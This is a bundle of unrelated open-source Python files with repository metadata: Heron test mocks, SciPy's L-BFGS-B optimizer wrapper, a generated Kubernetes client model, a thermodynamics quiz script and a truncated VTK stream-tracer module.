from heronpy.api.serializer import PythonSerializer
from heron.instance.src.python.utils.metrics import MetricsCollector
from heron.instance.src.python.utils.misc import (OutgoingTupleHelper, PhysicalPlanHelper,
HeronCommunicator)
from heron.proto import tuple_pb2
import heron.instance.src.python.utils.system_constants as constants
import heron.instance.tests.python.mock_protobuf as mock_protobuf
prim_list = [1000, -234, 0.00023, "string",
["abc", "def", "ghi"], True, False,
("tuple", 123, True), None, {}]
# Returns legit looking topology
def get_a_sample_pplan():
"""Returns a legitimate looking physical plan
This topology has 1 spout and 2 bolts. Currently no input/output streams.
There is only one stream manager.
[Instance 1: spout1]
- instance_id = "instance1"
- task_id = 100
- component_index = 0
- component_name = "spout1"
[Instance 2: bolt1]
- instance_id = "instance2"
- task_id = 200
- component_index = 0
- component_name = "bolt1"
[instance 3: bolt2]
- instance_id = "instance3"
- task_id = 300
- component_index = 0
- component_name = "bolt2"
:returns: PhysicalPlan message and a list of dictionaries for each instance containing
(instance_id, task_id, comp_index, comp_name)
"""
spout_1 = mock_protobuf.get_mock_spout(component=mock_protobuf.get_mock_component(name="spout1"))
bolt_1 = mock_protobuf.get_mock_bolt(component=mock_protobuf.get_mock_component(name="bolt1"))
bolt_2 = mock_protobuf.get_mock_bolt(component=mock_protobuf.get_mock_component(name="bolt2"))
topology = mock_protobuf.get_mock_topology(spouts=[spout_1], bolts=[bolt_1, bolt_2])
instance_ids = ["instance1", "instance2", "instancer3"]
task_ids = [100, 200, 300]
comp_indexes = [0, 0, 0]
comp_names = ["spout1", "bolt1", "bolt2"]
instances = []
for i_id, t_id, c_i, c_name in zip(instance_ids, task_ids, comp_indexes, comp_names):
info = mock_protobuf.get_mock_instance_info(task_id=t_id,
component_index=c_i,
component_name=c_name)
instance = mock_protobuf.get_mock_instance(instance_id=i_id, info=info)
instances.append(instance)
pplan = mock_protobuf.get_mock_pplan(topology=topology, instances=instances)
keys = ["instance_id", "task_id", "comp_index", "comp_name"]
zipped = zip(instance_ids, task_ids, comp_indexes, comp_names)
return pplan, [dict(zip(keys, z)) for z in zipped]
def make_data_tuple_from_list(lst, serializer=PythonSerializer()):
"""Make HeronDataTuple from a list of objects"""
data_tuple = tuple_pb2.HeronDataTuple()
data_tuple.key = 0
tuple_size_in_bytes = 0
for obj in lst:
serialized = serializer.serialize(obj)
data_tuple.values.append(serialized)
tuple_size_in_bytes += len(serialized)
return data_tuple, tuple_size_in_bytes
class MockOutgoingTupleHelper(OutgoingTupleHelper):
"""Creates a mock OutgoingTupleHelper class, for unittesting"""
SAMPLE_SUCCESS = 0
def __init__(self, mode=SAMPLE_SUCCESS):
self.called_init_new_data = False
self.called_init_new_control = False
sample_sys_config = {constants.INSTANCE_SET_DATA_TUPLE_CAPACITY: 1000,
constants.INSTANCE_SET_DATA_TUPLE_SIZE_BYTES: 2000,
constants.INSTANCE_SET_CONTROL_TUPLE_CAPACITY: 3000}
if mode == MockOutgoingTupleHelper.SAMPLE_SUCCESS:
pplan_helper, out_stream = self._prepare_sample_success()
with patch("heron.instance.src.python.utils.system_config.get_sys_config",
side_effect=lambda: sample_sys_config):
super(MockOutgoingTupleHelper, self).__init__(pplan_helper, out_stream)
@staticmethod
def _prepare_sample_success():
pplan, instances = get_a_sample_pplan()
pplan_helper = PhysicalPlanHelper(pplan, instances[0]["instance_id"], "topology.pex.path")
out_stream = HeronCommunicator(producer_cb=None, consumer_cb=None)
return pplan_helper, out_stream
def _init_new_data_tuple(self, stream_id):
self.called_init_new_data = True
OutgoingTupleHelper._init_new_data_tuple(self, stream_id)
def _init_new_control_tuple(self):
self.called_init_new_control = True
OutgoingTupleHelper._init_new_control_tuple(self)
class MockMetricsCollector(MetricsCollector):
"""Creates a mock MetricsCollector class, for unittesting"""
def __init__(self):
self.registered_timers = []
super(MockMetricsCollector, self).__init__(None, HeronCommunicator())
def _register_timer_task(self, time_bucket_in_sec):
self.registered_timers.append(time_bucket_in_sec)
class MockCustomGrouping(ICustomGrouping):
ALL_TARGET_MODE = 0 # returns the whole list of target tasks
RANDOM_TARGET_MODE = 1
WRONG_RETURN_TYPE_MODE = 2
WRONG_CHOOSE_TASK_MODE = 3
def __init__(self, mode):
super(MockCustomGrouping, self).__init__()
self.mode = mode
def prepare(self, context, component, stream, target_tasks):
self.target_tasks = target_tasks
def choose_tasks(self, values):
if self.mode == self.ALL_TARGET_MODE:
return self.target_tasks
elif self.mode == self.RANDOM_TARGET_MODE:
return [task for task in self.target_tasks if bool(random.getrandbits(1))]
elif self.mode == self.WRONG_RETURN_TYPE_MODE:
return 'string'
elif self.mode == self.WRONG_CHOOSE_TASK_MODE:
ret = []
while len(ret) < 5:
i = random.randint(1, 1000)
if i not in self.target_tasks and i not in ret:
ret.append(i)
else:
continue
return ret
class MockTaskHook(ITaskHook):
def prepare(self, conf, context):
self.clean_up_called = False
self.emit_called = False
self.spout_ack_called = False
self.spout_fail_called = False
self.bolt_exec_called = False
self.bolt_ack_called = False
self.bolt_fail_called = False
def emit(self, emit_info):
self.emit_called = True
def spout_ack(self, spout_ack_info):
self.spout_ack_called = True
def spout_fail(self, spout_fail_info):
self.spout_fail_called = True
def bolt_execute(self, bolt_execute_info):
self.bolt_exec_called = True
def bolt_ack(self, bolt_ack_info):
self.bolt_ack_called = True
def bolt_fail(self, bolt_fail_info):
self.bolt_fail_called = True
|
{
"content_hash": "87a920c80216afd12f5def20cf2d2a0a",
"timestamp": "",
"source": "github",
"line_count": 188,
"max_line_length": 99,
"avg_line_length": 35.930851063829785,
"alnum_prop": 0.6786084381939305,
"repo_name": "lucperkins/heron",
"id": "e727acaa1f48762adbffd09d82b7a9b7e93cb255",
"size": "7396",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "heron/instance/tests/python/utils/mock_generator.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "C",
"bytes": "11709"
},
{
"name": "C++",
"bytes": "1623239"
},
{
"name": "CSS",
"bytes": "109554"
},
{
"name": "HCL",
"bytes": "2115"
},
{
"name": "HTML",
"bytes": "156820"
},
{
"name": "Java",
"bytes": "4466689"
},
{
"name": "JavaScript",
"bytes": "1110981"
},
{
"name": "M4",
"bytes": "17941"
},
{
"name": "Makefile",
"bytes": "1046"
},
{
"name": "Objective-C",
"bytes": "1929"
},
{
"name": "Python",
"bytes": "1537910"
},
{
"name": "Ruby",
"bytes": "1930"
},
{
"name": "Scala",
"bytes": "72781"
},
{
"name": "Shell",
"bytes": "166876"
},
{
"name": "Smarty",
"bytes": "528"
},
{
"name": "Thrift",
"bytes": "915"
}
],
"symlink_target": ""
}
|
"""
Functions
---------
.. autosummary::
:toctree: generated/
fmin_l_bfgs_b
"""
## License for the Python wrapper
## ==============================
## Copyright (c) 2004 David M. Cooke <cookedm@physics.mcmaster.ca>
## Permission is hereby granted, free of charge, to any person obtaining a
## copy of this software and associated documentation files (the "Software"),
## to deal in the Software without restriction, including without limitation
## the rights to use, copy, modify, merge, publish, distribute, sublicense,
## and/or sell copies of the Software, and to permit persons to whom the
## Software is furnished to do so, subject to the following conditions:
## The above copyright notice and this permission notice shall be included in
## all copies or substantial portions of the Software.
## THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
## IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
## FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
## AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
## LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
## FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
## DEALINGS IN THE SOFTWARE.
## Modifications by Travis Oliphant and Enthought, Inc. for inclusion in SciPy
from __future__ import division, print_function, absolute_import
import numpy as np
from numpy import array, asarray, float64, int32, zeros
from . import _lbfgsb
from .optimize import (MemoizeJac, OptimizeResult,
_check_unknown_options, wrap_function,
_approx_fprime_helper)
from scipy.sparse.linalg import LinearOperator
__all__ = ['fmin_l_bfgs_b', 'LbfgsInvHessProduct']
def fmin_l_bfgs_b(func, x0, fprime=None, args=(),
approx_grad=0,
bounds=None, m=10, factr=1e7, pgtol=1e-5,
epsilon=1e-8,
iprint=-1, maxfun=15000, maxiter=15000, disp=None,
callback=None, maxls=20):
"""
Minimize a function func using the L-BFGS-B algorithm.
Parameters
----------
func : callable f(x,*args)
Function to minimise.
x0 : ndarray
Initial guess.
fprime : callable fprime(x,*args), optional
The gradient of `func`. If None, then `func` returns the function
value and the gradient (``f, g = func(x, *args)``), unless
`approx_grad` is True in which case `func` returns only ``f``.
args : sequence, optional
Arguments to pass to `func` and `fprime`.
approx_grad : bool, optional
Whether to approximate the gradient numerically (in which case
`func` returns only the function value).
bounds : list, optional
``(min, max)`` pairs for each element in ``x``, defining
the bounds on that parameter. Use None or +-inf for one of ``min`` or
``max`` when there is no bound in that direction.
m : int, optional
The maximum number of variable metric corrections
used to define the limited memory matrix. (The limited memory BFGS
method does not store the full hessian but uses this many terms in an
approximation to it.)
factr : float, optional
The iteration stops when
``(f^k - f^{k+1})/max{|f^k|,|f^{k+1}|,1} <= factr * eps``,
where ``eps`` is the machine precision, which is automatically
generated by the code. Typical values for `factr` are: 1e12 for
low accuracy; 1e7 for moderate accuracy; 10.0 for extremely
high accuracy. See Notes for relationship to `ftol`, which is exposed
(instead of `factr`) by the `scipy.optimize.minimize` interface to
L-BFGS-B.
pgtol : float, optional
The iteration will stop when
``max{|proj g_i | i = 1, ..., n} <= pgtol``
where ``pg_i`` is the i-th component of the projected gradient.
epsilon : float, optional
Step size used when `approx_grad` is True, for numerically
calculating the gradient
iprint : int, optional
Controls the frequency of output. ``iprint < 0`` means no output;
``iprint = 0`` print only one line at the last iteration;
``0 < iprint < 99`` print also f and ``|proj g|`` every iprint iterations;
``iprint = 99`` print details of every iteration except n-vectors;
``iprint = 100`` print also the changes of active set and final x;
``iprint > 100`` print details of every iteration including x and g.
disp : int, optional
If zero, then no output. If a positive number, then this over-rides
`iprint` (i.e., `iprint` gets the value of `disp`).
maxfun : int, optional
Maximum number of function evaluations.
maxiter : int, optional
Maximum number of iterations.
callback : callable, optional
Called after each iteration, as ``callback(xk)``, where ``xk`` is the
current parameter vector.
maxls : int, optional
Maximum number of line search steps (per iteration). Default is 20.
Returns
-------
x : array_like
Estimated position of the minimum.
f : float
Value of `func` at the minimum.
d : dict
Information dictionary.
* d['warnflag'] is
- 0 if converged,
- 1 if too many function evaluations or too many iterations,
- 2 if stopped for another reason, given in d['task']
* d['grad'] is the gradient at the minimum (should be 0 ish)
* d['funcalls'] is the number of function calls made.
* d['nit'] is the number of iterations.
See also
--------
minimize: Interface to minimization algorithms for multivariate
functions. See the 'L-BFGS-B' `method` in particular. Note that the
`ftol` option is made available via that interface, while `factr` is
provided via this interface, where `factr` is the factor multiplying
the default machine floating-point precision to arrive at `ftol`:
``ftol = factr * numpy.finfo(float).eps``.
Notes
-----
License of L-BFGS-B (FORTRAN code):
The version included here (in fortran code) is 3.0
(released April 25, 2011). It was written by Ciyou Zhu, Richard Byrd,
and Jorge Nocedal <nocedal@ece.nwu.edu>. It carries the following
condition for use:
This software is freely available, but we expect that all publications
describing work using this software, or all commercial products using it,
quote at least one of the references given below. This software is released
under the BSD License.
References
----------
* R. H. Byrd, P. Lu and J. Nocedal. A Limited Memory Algorithm for Bound
Constrained Optimization, (1995), SIAM Journal on Scientific and
Statistical Computing, 16, 5, pp. 1190-1208.
* C. Zhu, R. H. Byrd and J. Nocedal. L-BFGS-B: Algorithm 778: L-BFGS-B,
FORTRAN routines for large scale bound constrained optimization (1997),
ACM Transactions on Mathematical Software, 23, 4, pp. 550 - 560.
* J.L. Morales and J. Nocedal. L-BFGS-B: Remark on Algorithm 778: L-BFGS-B,
FORTRAN routines for large scale bound constrained optimization (2011),
ACM Transactions on Mathematical Software, 38, 1.
"""
# handle fprime/approx_grad
if approx_grad:
fun = func
jac = None
elif fprime is None:
fun = MemoizeJac(func)
jac = fun.derivative
else:
fun = func
jac = fprime
# build options
if disp is None:
disp = iprint
opts = {'disp': disp,
'iprint': iprint,
'maxcor': m,
'ftol': factr * np.finfo(float).eps,
'gtol': pgtol,
'eps': epsilon,
'maxfun': maxfun,
'maxiter': maxiter,
'callback': callback,
'maxls': maxls}
res = _minimize_lbfgsb(fun, x0, args=args, jac=jac, bounds=bounds,
**opts)
d = {'grad': res['jac'],
'task': res['message'],
'funcalls': res['nfev'],
'nit': res['nit'],
'warnflag': res['status']}
f = res['fun']
x = res['x']
return x, f, d
def _minimize_lbfgsb(fun, x0, args=(), jac=None, bounds=None,
disp=None, maxcor=10, ftol=2.2204460492503131e-09,
gtol=1e-5, eps=1e-8, maxfun=15000, maxiter=15000,
iprint=-1, callback=None, maxls=20, **unknown_options):
"""
Minimize a scalar function of one or more variables using the L-BFGS-B
algorithm.
Options
-------
disp : None or int
If `disp is None` (the default), then the supplied version of `iprint`
is used. If `disp is not None`, then it overrides the supplied version
of `iprint` with the behaviour you outlined.
maxcor : int
The maximum number of variable metric corrections used to
define the limited memory matrix. (The limited memory BFGS
method does not store the full hessian but uses this many terms
in an approximation to it.)
ftol : float
The iteration stops when ``(f^k -
f^{k+1})/max{|f^k|,|f^{k+1}|,1} <= ftol``.
gtol : float
The iteration will stop when ``max{|proj g_i | i = 1, ..., n}
<= gtol`` where ``pg_i`` is the i-th component of the
projected gradient.
eps : float
Step size used for numerical approximation of the jacobian.
maxfun : int
Maximum number of function evaluations.
maxiter : int
Maximum number of iterations.
maxls : int, optional
Maximum number of line search steps (per iteration). Default is 20.
Notes
-----
The option `ftol` is exposed via the `scipy.optimize.minimize` interface,
but calling `scipy.optimize.fmin_l_bfgs_b` directly exposes `factr`. The
relationship between the two is ``ftol = factr * numpy.finfo(float).eps``.
I.e., `factr` multiplies the default machine floating-point precision to
arrive at `ftol`.
"""
_check_unknown_options(unknown_options)
m = maxcor
epsilon = eps
pgtol = gtol
factr = ftol / np.finfo(float).eps
x0 = asarray(x0).ravel()
n, = x0.shape
if bounds is None:
bounds = [(None, None)] * n
if len(bounds) != n:
raise ValueError('length of x0 != length of bounds')
# unbounded variables must use None, not +-inf, for optimizer to work properly
bounds = [(None if l == -np.inf else l, None if u == np.inf else u) for l, u in bounds]
if disp is not None:
if disp == 0:
iprint = -1
else:
iprint = disp
n_function_evals, fun = wrap_function(fun, ())
if jac is None:
def func_and_grad(x):
f = fun(x, *args)
g = _approx_fprime_helper(x, fun, epsilon, args=args, f0=f)
return f, g
else:
def func_and_grad(x):
f = fun(x, *args)
g = jac(x, *args)
return f, g
nbd = zeros(n, int32)
low_bnd = zeros(n, float64)
upper_bnd = zeros(n, float64)
bounds_map = {(None, None): 0,
(1, None): 1,
(1, 1): 2,
(None, 1): 3}
for i in range(0, n):
l, u = bounds[i]
if l is not None:
low_bnd[i] = l
l = 1
if u is not None:
upper_bnd[i] = u
u = 1
nbd[i] = bounds_map[l, u]
if not maxls > 0:
raise ValueError('maxls must be positive.')
x = array(x0, float64)
f = array(0.0, float64)
g = zeros((n,), float64)
wa = zeros(2*m*n + 5*n + 11*m*m + 8*m, float64)
iwa = zeros(3*n, int32)
task = zeros(1, 'S60')
csave = zeros(1, 'S60')
lsave = zeros(4, int32)
isave = zeros(44, int32)
dsave = zeros(29, float64)
task[:] = 'START'
n_iterations = 0
while 1:
# x, f, g, wa, iwa, task, csave, lsave, isave, dsave = \
_lbfgsb.setulb(m, x, low_bnd, upper_bnd, nbd, f, g, factr,
pgtol, wa, iwa, task, iprint, csave, lsave,
isave, dsave, maxls)
task_str = task.tostring()
if task_str.startswith(b'FG'):
# The minimization routine wants f and g at the current x.
# Note that interruptions due to maxfun are postponed
# until the completion of the current minimization iteration.
# Overwrite f and g:
f, g = func_and_grad(x)
elif task_str.startswith(b'NEW_X'):
# new iteration
n_iterations += 1
if callback is not None:
callback(np.copy(x))
if n_iterations >= maxiter:
task[:] = 'STOP: TOTAL NO. of ITERATIONS REACHED LIMIT'
elif n_function_evals[0] > maxfun:
task[:] = ('STOP: TOTAL NO. of f AND g EVALUATIONS '
'EXCEEDS LIMIT')
else:
break
task_str = task.tostring().strip(b'\x00').strip()
if task_str.startswith(b'CONV'):
warnflag = 0
elif n_function_evals[0] > maxfun or n_iterations >= maxiter:
warnflag = 1
else:
warnflag = 2
# These two portions of the workspace are described in the mainlb
# subroutine in lbfgsb.f. See line 363.
s = wa[0: m*n].reshape(m, n)
y = wa[m*n: 2*m*n].reshape(m, n)
# See lbfgsb.f line 160 for this portion of the workspace.
# isave(31) = the total number of BFGS updates prior the current iteration;
n_bfgs_updates = isave[30]
n_corrs = min(n_bfgs_updates, maxcor)
hess_inv = LbfgsInvHessProduct(s[:n_corrs], y[:n_corrs])
return OptimizeResult(fun=f, jac=g, nfev=n_function_evals[0],
nit=n_iterations, status=warnflag, message=task_str,
x=x, success=(warnflag == 0), hess_inv=hess_inv)
class LbfgsInvHessProduct(LinearOperator):
"""Linear operator for the L-BFGS approximate inverse Hessian.
This operator computes the product of a vector with the approximate inverse
of the Hessian of the objective function, using the L-BFGS limited
memory approximation to the inverse Hessian, accumulated during the
optimization.
Objects of this class implement the ``scipy.sparse.linalg.LinearOperator``
interface.
Parameters
----------
sk : array_like, shape=(n_corr, n)
Array of `n_corr` most recent updates to the solution vector.
(See [1]).
yk : array_like, shape=(n_corr, n)
Array of `n_corr` most recent updates to the gradient. (See [1]).
References
----------
.. [1] Nocedal, Jorge. "Updating quasi-Newton matrices with limited
storage." Mathematics of computation 35.151 (1980): 773-782.
"""
def __init__(self, sk, yk):
"""Construct the operator."""
if sk.shape != yk.shape or sk.ndim != 2:
raise ValueError('sk and yk must have matching shape, (n_corrs, n)')
n_corrs, n = sk.shape
super(LbfgsInvHessProduct, self).__init__(
dtype=np.float64, shape=(n, n))
self.sk = sk
self.yk = yk
self.n_corrs = n_corrs
self.rho = 1 / np.einsum('ij,ij->i', sk, yk)
def _matvec(self, x):
"""Efficient matrix-vector multiply with the BFGS matrices.
This calculation is described in Section (4) of [1].
Parameters
----------
x : ndarray
An array with shape (n,) or (n,1).
Returns
-------
y : ndarray
The matrix-vector product
"""
s, y, n_corrs, rho = self.sk, self.yk, self.n_corrs, self.rho
q = np.array(x, dtype=self.dtype, copy=True)
if q.ndim == 2 and q.shape[1] == 1:
q = q.reshape(-1)
alpha = np.zeros(n_corrs)
for i in range(n_corrs-1, -1, -1):
alpha[i] = rho[i] * np.dot(s[i], q)
q = q - alpha[i]*y[i]
r = q
for i in range(n_corrs):
beta = rho[i] * np.dot(y[i], r)
r = r + s[i] * (alpha[i] - beta)
return r
def todense(self):
"""Return a dense array representation of this operator.
Returns
-------
arr : ndarray, shape=(n, n)
An array with the same shape and containing
the same data represented by this `LinearOperator`.
"""
s, y, n_corrs, rho = self.sk, self.yk, self.n_corrs, self.rho
I = np.eye(*self.shape, dtype=self.dtype)
Hk = I
for i in range(n_corrs):
A1 = I - s[i][:, np.newaxis] * y[i][np.newaxis, :] * rho[i]
A2 = I - y[i][:, np.newaxis] * s[i][np.newaxis, :] * rho[i]
Hk = np.dot(A1, np.dot(Hk, A2)) + (rho[i] * s[i][:, np.newaxis] *
s[i][np.newaxis, :])
return Hk
|
{
"content_hash": "2d138b3301771947f2722aaefa0e70a0",
"timestamp": "",
"source": "github",
"line_count": 468,
"max_line_length": 91,
"avg_line_length": 36.3440170940171,
"alnum_prop": 0.5882767946381328,
"repo_name": "lhilt/scipy",
"id": "5425ffff3f32b4d8dd9a942a020cb6058d2c51a1",
"size": "17009",
"binary": false,
"copies": "5",
"ref": "refs/heads/master",
"path": "scipy/optimize/lbfgsb.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "C",
"bytes": "4396416"
},
{
"name": "C++",
"bytes": "643592"
},
{
"name": "Fortran",
"bytes": "5368331"
},
{
"name": "MATLAB",
"bytes": "4346"
},
{
"name": "Makefile",
"bytes": "778"
},
{
"name": "Python",
"bytes": "12378541"
},
{
"name": "Shell",
"bytes": "538"
},
{
"name": "TeX",
"bytes": "52106"
}
],
"symlink_target": ""
}
|
"""
Kubernetes
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen)
OpenAPI spec version: v1.6.1
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from pprint import pformat
from six import iteritems
import re
class V1beta1LocalSubjectAccessReview(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
def __init__(self, api_version=None, kind=None, metadata=None, spec=None, status=None):
"""
V1beta1LocalSubjectAccessReview - a model defined in Swagger
:param dict swaggerTypes: The key is attribute name
and the value is attribute type.
:param dict attributeMap: The key is attribute name
and the value is json key in definition.
"""
self.swagger_types = {
'api_version': 'str',
'kind': 'str',
'metadata': 'V1ObjectMeta',
'spec': 'V1beta1SubjectAccessReviewSpec',
'status': 'V1beta1SubjectAccessReviewStatus'
}
self.attribute_map = {
'api_version': 'apiVersion',
'kind': 'kind',
'metadata': 'metadata',
'spec': 'spec',
'status': 'status'
}
self._api_version = api_version
self._kind = kind
self._metadata = metadata
self._spec = spec
self._status = status
@property
def api_version(self):
"""
Gets the api_version of this V1beta1LocalSubjectAccessReview.
APIVersion defines the versioned schema of this representation of an object. Servers should convert recognized schemas to the latest internal value, and may reject unrecognized values. More info: http://releases.k8s.io/HEAD/docs/devel/api-conventions.md#resources
:return: The api_version of this V1beta1LocalSubjectAccessReview.
:rtype: str
"""
return self._api_version
@api_version.setter
def api_version(self, api_version):
"""
Sets the api_version of this V1beta1LocalSubjectAccessReview.
APIVersion defines the versioned schema of this representation of an object. Servers should convert recognized schemas to the latest internal value, and may reject unrecognized values. More info: http://releases.k8s.io/HEAD/docs/devel/api-conventions.md#resources
:param api_version: The api_version of this V1beta1LocalSubjectAccessReview.
:type: str
"""
self._api_version = api_version
@property
def kind(self):
"""
Gets the kind of this V1beta1LocalSubjectAccessReview.
Kind is a string value representing the REST resource this object represents. Servers may infer this from the endpoint the client submits requests to. Cannot be updated. In CamelCase. More info: http://releases.k8s.io/HEAD/docs/devel/api-conventions.md#types-kinds
:return: The kind of this V1beta1LocalSubjectAccessReview.
:rtype: str
"""
return self._kind
@kind.setter
def kind(self, kind):
"""
Sets the kind of this V1beta1LocalSubjectAccessReview.
Kind is a string value representing the REST resource this object represents. Servers may infer this from the endpoint the client submits requests to. Cannot be updated. In CamelCase. More info: http://releases.k8s.io/HEAD/docs/devel/api-conventions.md#types-kinds
:param kind: The kind of this V1beta1LocalSubjectAccessReview.
:type: str
"""
self._kind = kind
@property
def metadata(self):
"""
Gets the metadata of this V1beta1LocalSubjectAccessReview.
:return: The metadata of this V1beta1LocalSubjectAccessReview.
:rtype: V1ObjectMeta
"""
return self._metadata
@metadata.setter
def metadata(self, metadata):
"""
Sets the metadata of this V1beta1LocalSubjectAccessReview.
:param metadata: The metadata of this V1beta1LocalSubjectAccessReview.
:type: V1ObjectMeta
"""
self._metadata = metadata
@property
def spec(self):
"""
Gets the spec of this V1beta1LocalSubjectAccessReview.
Spec holds information about the request being evaluated. spec.namespace must be equal to the namespace you made the request against. If empty, it is defaulted.
:return: The spec of this V1beta1LocalSubjectAccessReview.
:rtype: V1beta1SubjectAccessReviewSpec
"""
return self._spec
@spec.setter
def spec(self, spec):
"""
Sets the spec of this V1beta1LocalSubjectAccessReview.
Spec holds information about the request being evaluated. spec.namespace must be equal to the namespace you made the request against. If empty, it is defaulted.
:param spec: The spec of this V1beta1LocalSubjectAccessReview.
:type: V1beta1SubjectAccessReviewSpec
"""
if spec is None:
raise ValueError("Invalid value for `spec`, must not be `None`")
self._spec = spec
@property
def status(self):
"""
Gets the status of this V1beta1LocalSubjectAccessReview.
Status is filled in by the server and indicates whether the request is allowed or not
:return: The status of this V1beta1LocalSubjectAccessReview.
:rtype: V1beta1SubjectAccessReviewStatus
"""
return self._status
@status.setter
def status(self, status):
"""
Sets the status of this V1beta1LocalSubjectAccessReview.
Status is filled in by the server and indicates whether the request is allowed or not
:param status: The status of this V1beta1LocalSubjectAccessReview.
:type: V1beta1SubjectAccessReviewStatus
"""
self._status = status
def to_dict(self):
"""
Returns the model properties as a dict
"""
result = {}
for attr, _ in iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""
Returns the string representation of the model
"""
return pformat(self.to_dict())
def __repr__(self):
"""
For `print` and `pprint`
"""
return self.to_str()
def __eq__(self, other):
"""
Returns true if both objects are equal
"""
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""
Returns true if both objects are not equal
"""
return not self == other
|
{
"content_hash": "475ed28c8d0d6f70e7ba51200a20c9a4",
"timestamp": "",
"source": "github",
"line_count": 216,
"max_line_length": 272,
"avg_line_length": 34.06018518518518,
"alnum_prop": 0.6165556612749762,
"repo_name": "skuda/client-python",
"id": "8bdd22802a3824c6fcc38d1a2fd94fda37321fda",
"size": "7374",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "kubernetes/client/models/v1beta1_local_subject_access_review.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "5907789"
},
{
"name": "Shell",
"bytes": "8195"
}
],
"symlink_target": ""
}
|
import quiz
def loadProblems(a):
a.problems.append(quiz.Problem(
"What is an adiabatic wall?",
"No net heat transfer to or from the working fluid. (Insulated)",
"B",
"C",
"A"))
a.problems.append(quiz.Problem(
"What is a control mass?",
"A closed system: a volume that has no mass transfer.",
"B",
"C",
"A"))
a.problems.append(quiz.Problem(
"What is Cp?",
"Specific heat at constant pressure.",
"B",
"C",
"A"))
a.problems.append(quiz.Problem(
"What is Cv?",
"Specific heat at constant volume.",
"B",
"C",
"A"))
#
# combustion
#
a.problems.append(quiz.Problem(
"What is a Rich mixture?",
"A",
"More fuel than stochiometric equilibrium. ",
"More air than stochiometric.",
"B"))
a.problems.append(quiz.Problem(
"What is the Damkoler number?",
"A",
"Ratio of the characteristic fluid time divided by the chemical reaction time.",
"Ratio of the chemical reaction time divided by the characteristic fluid time.",
"B"))
a.problems.append(quiz.Problem(
"What is a Rich mixture?",
"A",
"More fuel than stochiometric equilibrium. ",
"More air than stochiometric.",
"B"))
def main():
a = quiz.App()
loadProblems(a)
a.run()
# steady as she goes
if __name__ == "__main__":
main()
#
# nick
# 4/20/14
#
|
{
"content_hash": "91b563b440cd8fc12e908050c4167951",
"timestamp": "",
"source": "github",
"line_count": 72,
"max_line_length": 84,
"avg_line_length": 19.40277777777778,
"alnum_prop": 0.5855404438081604,
"repo_name": "nicholasmalaya/arcanus",
"id": "40206f32c6870837b3251e71891e3f715deb546e",
"size": "1397",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "inspectio/thermo_quiz.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C++",
"bytes": "87967"
},
{
"name": "Makefile",
"bytes": "14290"
},
{
"name": "Mathematica",
"bytes": "166461"
},
{
"name": "Matlab",
"bytes": "62080"
},
{
"name": "Python",
"bytes": "202786"
},
{
"name": "Shell",
"bytes": "10820"
},
{
"name": "TeX",
"bytes": "1106102"
}
],
"symlink_target": ""
}
|
import input_array_choice_mixin
from input_array_choice_mixin import InputArrayChoiceMixin
from module_base import ModuleBase
from module_mixins import ScriptedConfigModuleMixin
import module_utils
import vtk
INTEG_TYPE = ['RK2', 'RK4', 'RK45']
INTEG_TYPE_TEXTS = ['Runge-Kutta 2', 'Runge-Kutta 4', 'Runge-Kutta 45']
INTEG_DIR = ['FORWARD', 'BACKWARD', 'BOTH']
INTEG_DIR_TEXTS = ['Forward', 'Backward', 'Both']
ARRAY_IDX = 0
class streamTracer(ScriptedConfigModuleMixin, InputArrayChoiceMixin, ModuleBase):
def __init__(self, module_manager):
ModuleBase.__init__(self, module_manager)
InputArrayChoiceMixin.__init__(self)
# 0 = RK2
# 1 = RK4
# 2 = RK45
self._config.integrator = INTEG_TYPE.index('RK2')
self._config.max_prop = 5.0
self._config.integration_direction = INTEG_DIR.index(
'FORWARD')
configList = [
('Vectors selection:', 'vectorsSelection', 'base:str', 'choice',
'The attribute that will be used as vectors for the warping.',
(input_array_choice_mixin.DEFAULT_SELECTION_STRING,)),
('Max propagation:', 'max_prop', 'base:float', 'text',
'The streamline will propagate up to this lenth.'),
('Integration direction:', 'integration_direction', 'base:int', 'choice',
'Select an integration direction.',
INTEG_DIR_TEXTS),
('Integrator type:', 'integrator', 'base:int', 'choice',
'Select an integrator for the streamlines.',
INTEG_TYPE_TEXTS)]
self._streamTracer = vtk.vtkStreamTracer()
ScriptedConfigModuleMixin.__init__(
self, configList,
{'Module (self)' : self,
'vtkStreamTracer' : self._streamTracer})
module_utils.setup_vtk_object_progress(self, self._streamTracer,
'Tracing stream lines.')
self.sync_module_logic_with_config()
def close(self):
# we play it safe... (the graph_editor/module_manager should have
# disconnected us by now)
for input_idx in range(len(self.get_input_descriptions())):
self.set_input(input_idx, None)
# this will take care of all display thingies
ScriptedConfigModuleMixin.close(self)
# get rid of our reference
del self._streamTracer
def execute_module(self):
self._streamTracer.Update()
if self.view_initialised:
choice = self._getWidget(0)
self.iac_execute_module(self._streamTracer, choice,
ARRAY_IDX)
def get_input_descriptions(self):
return ('VTK Vector dataset', 'VTK source geometry')
def set_input(self, idx, inputStream):
